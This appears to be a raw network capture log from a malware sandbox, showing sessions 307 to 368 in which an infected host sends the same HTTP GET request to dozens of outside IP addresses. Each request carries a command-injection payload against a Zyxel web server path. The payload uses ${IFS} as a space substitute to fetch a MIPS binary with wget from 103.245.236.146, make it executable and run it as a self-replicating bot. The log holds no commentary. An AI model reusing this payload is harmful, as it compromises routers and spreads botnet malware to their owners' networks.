                                                Jan 28, 2024 10:15:57.539429903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                307192.168.2.235874691.66.233.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539463997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                308192.168.2.2340946194.1.133.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539486885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                309192.168.2.2353016171.111.107.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539515018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                310192.168.2.234072072.55.54.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539520025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                311192.168.2.233650645.247.90.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539550066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                312192.168.2.235518864.44.102.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539567947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                313192.168.2.2348694116.48.72.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:57.539623022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                314192.168.2.2336454192.111.41.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543354988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                315192.168.2.2333042162.138.169.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543378115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                316192.168.2.235918093.39.180.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543394089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                317192.168.2.235837246.241.51.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543405056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                318192.168.2.2356026108.168.61.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543425083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                319192.168.2.233789468.19.3.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543471098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                320192.168.2.2359134193.132.107.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543513060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                321192.168.2.2349542180.82.238.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543549061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                322192.168.2.2341682174.70.96.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543581963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                323192.168.2.2345990195.129.24.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543597937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                324192.168.2.2355344169.197.31.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543632984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                325192.168.2.2334120182.195.148.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543658018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                326192.168.2.2350310180.203.157.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543673038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                327192.168.2.2342990219.96.48.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543683052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                328192.168.2.2344180161.22.154.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543706894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                329192.168.2.2334106195.223.2.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543737888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                330192.168.2.2346784132.19.84.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543767929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                331192.168.2.2356250148.125.151.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543802023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                332192.168.2.2342044147.171.207.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543816090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                333192.168.2.2333222204.154.122.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543859005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                334192.168.2.235459288.223.72.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543885946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                335192.168.2.2346308103.16.86.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543899059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                336192.168.2.234934085.0.118.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543920994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                337192.168.2.2358240116.189.225.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543942928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                338192.168.2.2341062131.165.17.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.543983936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                339192.168.2.2352630112.8.77.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544034004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                340192.168.2.2342712218.230.223.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544076920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                341192.168.2.234384666.80.15.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544078112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                342192.168.2.233346070.249.89.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544078112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                343192.168.2.23489889.174.15.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544114113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                344192.168.2.2354056185.47.125.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544116974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                345192.168.2.2346942133.217.48.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544173002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                346192.168.2.2357362120.192.246.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544198990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                347192.168.2.2346312170.110.218.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544208050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                348192.168.2.233642278.48.75.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544276953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                349192.168.2.2353056117.144.44.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544296980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                350192.168.2.23594702.123.81.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544311047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                351192.168.2.233415491.9.14.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544332981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                352192.168.2.2345386108.21.134.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544363976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                353192.168.2.2360774135.155.232.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544393063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                354192.168.2.234418848.119.19.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544408083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                355192.168.2.2349394150.203.190.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544429064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                356192.168.2.2350890193.233.39.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544445992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                357192.168.2.233786445.37.243.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544476986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                358192.168.2.2333038139.47.248.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544521093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                359192.168.2.234961268.13.11.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544552088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                360192.168.2.2356600188.147.28.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544580936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                361192.168.2.2352380105.140.178.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.544589996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                362192.168.2.234556234.165.18.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:58.545119047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                363192.168.2.2334972125.167.94.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.546972990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                364192.168.2.23584708.204.211.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.546998978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                365192.168.2.233296424.154.27.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547030926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                366192.168.2.2358524151.53.218.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547034025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                367192.168.2.2336010207.43.117.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547068119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                368192.168.2.23607382.130.183.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547090054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
